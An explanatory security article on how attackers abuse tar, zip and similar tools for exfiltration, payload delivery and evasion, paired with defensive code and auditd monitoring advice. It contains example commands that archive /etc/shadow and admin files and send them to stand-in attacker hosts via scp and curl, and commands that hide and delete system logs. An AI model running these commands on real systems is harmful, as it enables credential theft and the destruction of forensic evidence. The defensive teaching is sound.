Compressing and Archiving: Friend, Foe, and Cybersecurity Threat

Compression and archiving are essential techniques in computing for reducing storage requirements and grouping files together. They are indispensable in legitimate IT operations, but like most tools, they can be weaponized in the wrong hands. Attackers use compression and archiving not just to save space but to hide, obfuscate, and smuggle data across network and security boundaries.

This article covers the fundamentals of compression and archiving, examines how adversaries exploit these methods during cyber attacks, and presents defensive strategies to mitigate such threats, with real-world examples and code snippets along the way.

Understanding Compression and Archiving

Compression is the process of encoding data using fewer bits than the original representation. This is often achieved through algorithms like DEFLATE (used in ZIP), LZMA (used in 7z), or BZIP2. The primary goal is to reduce file size to save storage space or improve transfer speed.
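To make the size reduction concrete, here is a minimal sketch that compresses the same buffer with the three algorithm families named above, using only the Python standard library. The sample data is a hypothetical, highly repetitive log line chosen for illustration; real files will compress differently.

```python
import bz2
import lzma
import zlib

# Hypothetical sample: repetitive text compresses well; real data will vary.
data = b"2024-01-01 INFO user=admin action=login status=ok\n" * 2000

compressed = {
    # zlib.compress emits a DEFLATE stream inside a small zlib wrapper.
    "DEFLATE (zlib)": zlib.compress(data, level=9),
    "LZMA": lzma.compress(data),
    "BZIP2": bz2.compress(data),
}

for name, blob in compressed.items():
    ratio = len(blob) / len(data)
    print(f"{name}: {len(data)} -> {len(blob)} bytes ({ratio:.2%} of original)")

# Compression is lossless: decompressing returns the exact original bytes.
restored = zlib.decompress(compressed["DEFLATE (zlib)"])
assert restored == data
```

The exact ratios depend on the input, so no figures are quoted here. Already-compressed or encrypted data typically shrinks very little.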

Archiving, on the other hand, is the process of combining multiple files into a single container without necessarily compressing them. Formats like TAR (Tape Archive) bundle files together for easier management, and compression can be optionally applied on top of the archive.

For example, a .tar.gz file is produced in two steps: tar first bundles the files into a single archive, and gzip then compresses that archive.
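The two steps can be kept separate in code to show that archiving and compression are independent operations. The sketch below uses Python's tarfile and gzip modules; the file names and contents are made up for illustration.

```python
import gzip
import io
import tarfile


def make_tar(files: dict) -> bytes:
    """Step 1: bundle files into an uncompressed TAR archive held in memory."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, content in files.items():
            info = tarfile.TarInfo(name=name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


# Hypothetical file names and contents.
files = {"a.txt": b"hello\n" * 500, "b.txt": b"world\n" * 500}

tar_bytes = make_tar(files)             # archive only, no compression
targz_bytes = gzip.compress(tar_bytes)  # Step 2: compress the archive

print(f"raw content: {sum(len(c) for c in files.values())} bytes")
print(f".tar:        {len(tar_bytes)} bytes")
print(f".tar.gz:     {len(targz_bytes)} bytes")

# Reading it back: tarfile undoes both layers when opened in "r:gz" mode.
with tarfile.open(fileobj=io.BytesIO(targz_bytes), mode="r:gz") as tar:
    names = tar.getnames()
print(names)
```

Note that the plain .tar is larger than the raw content because of per-file headers and block padding; only the gzip step reduces size.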

Legitimate Uses in IT

In normal IT operations, compression and archiving are used to:

Reduce storage costs.
Bundle related files for deployment or backup.
Transfer large datasets efficiently over the network.
Create package distributions for software.

These legitimate uses make compression tools such as tar, zip, and 7z ubiquitous in servers, desktops, and even embedded devices.

Weaponization in Cyber Attacks

The same properties that make compression useful in IT also make it appealing for malicious actors. In a cyber attack, compression and archiving are often used for data exfiltration, payload delivery, log manipulation, and defense evasion.

Data Exfiltration

Attackers often compress stolen files before exfiltration. This reduces the size of the transfer, making it faster, and can help avoid detection by combining many files into one. It also makes it harder for security tools to inspect the content in real time.

For example, after compromising a server, an attacker might execute:

tar -czf /tmp/reports.tar.gz /var/log /home/admin/Documents
scp /tmp/reports.tar.gz attacker@malicious-server.com:/data

In this scenario:

The tar command bundles the listed directories (-c) and gzip-compresses them (-z) into a single file, /tmp/reports.tar.gz (-f).
The archive is then copied over SSH with scp to an attacker-controlled server.

Payload Delivery

Attackers sometimes deliver malicious payloads inside compressed archives to bypass email filters or web proxies. Many detection systems unpack only the first layer of an archive and fail to analyze deeply nested ones.

An example malicious attachment could be a .zip file containing:

A disguised executable (invoice.pdf.exe).
Additional payloads in multi-layered .zip or .rar files.
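From the defender's side, the two indicators listed above (a double extension and nested archives) can be checked with a short recursive scan. The following is a sketch under stated assumptions, not a production scanner: the function names, the extension lists, and the depth and size limits are hypothetical, and only nested .zip members are followed because Python's standard library does not read .rar.

```python
import io
import zipfile

# Hypothetical policy values chosen for illustration.
MAX_DEPTH = 5
MAX_MEMBER_BYTES = 50 * 1024 * 1024
RISKY_EXTENSIONS = (".exe", ".scr", ".js", ".vbs", ".bat")
DECOY_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".txt")


def has_double_extension(name: str) -> bool:
    """True for names such as invoice.pdf.exe (decoy plus executable suffix)."""
    lower = name.lower()
    if not lower.endswith(RISKY_EXTENSIONS):
        return False
    stem = lower.rsplit(".", 1)[0]
    return stem.endswith(DECOY_EXTENSIONS)


def scan_zip(data: bytes, depth: int = 0, path: str = "") -> list:
    """Recursively list suspicious members of a ZIP held in memory."""
    if depth > MAX_DEPTH:
        return [f"{path or '<root>'}: nested deeper than {MAX_DEPTH} levels"]
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            member = f"{path}/{info.filename}" if path else info.filename
            if has_double_extension(info.filename):
                findings.append(f"{member}: disguised executable")
            if info.filename.lower().endswith(".zip"):
                # Refuse to unpack members with a huge declared size.
                if info.file_size > MAX_MEMBER_BYTES:
                    findings.append(f"{member}: too large to unpack safely")
                    continue
                findings.extend(scan_zip(zf.read(info), depth + 1, member))
    return findings


def build_zip(members: dict) -> bytes:
    """Helper for the demo: build a ZIP in memory from name -> bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Demo: an outer ZIP hiding a disguised executable one level down.
inner = build_zip({"invoice.pdf.exe": b"MZ"})
outer = build_zip({"readme.txt": b"see attached", "inner.zip": inner})
findings = scan_zip(outer)
for line in findings:
    print(line)
```

The depth and size caps matter as much as the detection logic: without them, a deliberately nested or oversized archive could exhaust the scanner itself.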

Log and Evidence Manipulation

To cover tracks, attackers may compress logs before deletion or move them into password-protected archives to delay forensic investigation:

zip -P 123456 hidden_logs.zip /var/log/auth.log /var/log/syslog
rm /var/log/auth.log /var/log/syslog

Password-protected ZIP files make it harder for automated tools to inspect content without manual intervention.
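Although the contents cannot be read without the password, the fact that a ZIP member is encrypted is usually visible in the archive metadata, which gives defenders something to alert on. The sketch below checks bit 0 of each member's general purpose flag via Python's zipfile module. The function name is hypothetical, and the approach assumes traditional per-entry ZIP encryption where the file listing itself is not hidden.

```python
import io
import zipfile

ENCRYPTED_FLAG = 0x1  # bit 0 of the ZIP general purpose bit flag


def encrypted_members(data: bytes) -> list:
    """Return names of members marked as encrypted, without decrypting them."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [
            info.filename
            for info in zf.infolist()
            if info.flag_bits & ENCRYPTED_FLAG
        ]


# Demo with an unencrypted archive; the standard library cannot create
# encrypted ZIPs, so this only shows the negative case.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("auth.log", b"login ok")
plain_result = encrypted_members(buf.getvalue())
print(plain_result)
```

A gateway or forensic triage script could use a check like this to route encrypted archives to manual review rather than silently passing them.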

Bypassing Content Filtering

Some Data Loss Prevention (DLP) solutions fail to inspect certain archive formats or large compressed files. Attackers exploit this by using uncommon formats such as .7z or .xz to wrap stolen data, slipping past security controls.
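One way to avoid relying on file extensions is to identify archive formats by their leading magic bytes, so a renamed .7z or .xz file is still recognized. The sketch below checks a small table of well-known signatures; the function name is hypothetical and the table is illustrative rather than exhaustive.

```python
import bz2
import gzip
import lzma
from typing import Optional

# Leading magic bytes of common archive and compression formats.
SIGNATURES = [
    (b"PK\x03\x04", "zip"),
    (b"\x1f\x8b", "gzip"),
    (b"BZh", "bzip2"),
    (b"\xfd7zXZ\x00", "xz"),
    (b"7z\xbc\xaf\x27\x1c", "7z"),
    (b"Rar!\x1a\x07", "rar"),
]


def sniff_format(data: bytes) -> Optional[str]:
    """Return the format name whose signature matches the start of data."""
    for magic, name in SIGNATURES:
        if data.startswith(magic):
            return name
    return None


# Demo: the extension is irrelevant, only the content is inspected.
samples = {
    "report.docx.tmp": lzma.compress(b"stolen data"),  # xz container by default
    "image.jpg": gzip.compress(b"stolen data"),
    "notes.txt": bz2.compress(b"stolen data"),
    "plain.bin": b"just some bytes",
}
for filename, blob in samples.items():
    print(filename, "->", sniff_format(blob))
```

Signature checks only catch archives that start at the first byte of the file. Data embedded deeper in another file, or wrapped in encryption, needs additional inspection.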

Red Team Perspective: Proof of Concept

A Red Team might demonstrate a data exfiltration proof-of-concept using publicly available tools. This simulation can help organizations understand the risks and validate detection capabilities.

Example: Simulating exfiltration with compression and transfer

# Compress sensitive files (reading /etc/shadow requires root privileges)
tar -czf sensitive.tar.gz /etc/passwd /etc/shadow
 
# Transfer to external server
curl -X POST -F 'file=@sensitive.tar.gz' https://fileshare.example.com/upload

The goal here is to mimic a real attacker’s behavior, test logging and alerting mechanisms, and measure response time.

Blue Team Perspective: Defensive Measures

From a defensive standpoint, the goal is not to ban compression tools outright, which would cripple normal operations, but to detect suspicious usage and apply security controls.

Monitoring and Alerting

Security teams should monitor the execution of compression commands on sensitive systems. This includes:

Logging invocations of tar, zip, 7z, and similar tools.
Detecting large archive creations in sensitive directories.

On Linux, this can be achieved with auditd:

auditctl -w /usr/bin/tar -p x -k tar_usage
auditctl -w /usr/bin/zip -p x -k zip_usage
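Execution auditing records who ran a tool, but not how large the result was. As a complement, a periodic sweep can flag large, recently written archives in sensitive directories. The following is a minimal sketch, assuming a hypothetical function name, suffix list, and thresholds; a real deployment would tune these and feed the results into existing alerting.

```python
import os
import tempfile
import time

# Hypothetical list of suffixes treated as archives.
ARCHIVE_SUFFIXES = (
    ".tar", ".tar.gz", ".tgz", ".zip", ".7z", ".rar", ".xz", ".bz2", ".gz",
)


def find_large_recent_archives(root, min_bytes, max_age_seconds, now=None):
    """Return sorted (path, size) pairs for big archives modified recently."""
    now = time.time() if now is None else now
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for fname in filenames:
            if not fname.lower().endswith(ARCHIVE_SUFFIXES):
                continue
            full = os.path.join(dirpath, fname)
            try:
                st = os.stat(full)
            except OSError:
                continue  # file vanished or is unreadable; skip it
            if st.st_size >= min_bytes and now - st.st_mtime <= max_age_seconds:
                hits.append((full, st.st_size))
    return sorted(hits)


# Demo in a throwaway directory: one archive above the threshold,
# one non-archive file that must be ignored.
with tempfile.TemporaryDirectory() as root:
    with open(os.path.join(root, "dump.tar.gz"), "wb") as fh:
        fh.write(b"\0" * 2048)
    with open(os.path.join(root, "notes.txt"), "wb") as fh:
        fh.write(b"\0" * 4096)
    demo_hits = find_large_recent_archives(
        root, min_bytes=1024, max_age_seconds=3600
    )
    print(demo_hits)
```

Matching on suffix alone is easy to evade by renaming the file, so a sweep like this works best alongside content-based identification and the auditd rules above.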

Content Inspection

Deploy tools that can inspect the content of archives at multiple levels of compression. Ensure your DLP or email gateway supports deep archive scanning and uncommon formats.

Rate Limiting and Network Controls

If possible, limit outbound transfers of large files and use TLS inspection to monitor compressed file uploads. Network segmentation can also limit where archives can be created and sent.

Educating Staff

End users and admins should understand that sending password-protected ZIP files to personal email accounts is risky, because the contents bypass inspection and leave the organization's control. Training can help reduce accidental policy violations.

Case Study: APT Group Using Compression for Exfiltration

A real-world example involves campaigns attributed to APT10, in which attackers reportedly used custom tools to compress large volumes of stolen intellectual property into .rar files before exfiltrating them over HTTPS to avoid suspicion. By splitting the archives into chunks and encrypting the .rar contents, they evaded both signature-based antivirus and content inspection tools.

Key Takeaways:

Compression and archiving are essential but easily abused.
Attackers use them for exfiltration, obfuscation, and bypassing detection.
Defenders should focus on monitoring, deep content inspection, and user education.
Real-world cases show that compression is a common element in advanced threats.

Conclusion

Compression and archiving are a double-edged sword. While they serve legitimate purposes in IT and software development, attackers exploit them to package and conceal malicious activity. Understanding the offensive potential of these tools allows defenders to design effective monitoring, detection, and response strategies.

Security teams must strike a balance between operational needs and security enforcement, restricting the misuse of compression utilities without disrupting legitimate workflows.